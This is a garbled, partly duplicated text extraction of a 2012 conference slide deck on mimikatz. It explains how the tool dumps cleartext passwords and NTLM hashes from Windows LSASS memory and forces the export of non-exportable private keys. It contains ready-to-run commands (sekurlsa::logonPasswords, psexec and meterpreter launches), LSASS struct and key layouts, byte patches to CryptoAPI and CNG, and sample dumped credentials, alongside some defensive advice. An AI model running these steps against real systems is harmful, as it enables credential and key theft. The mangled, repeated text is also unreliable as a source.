Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
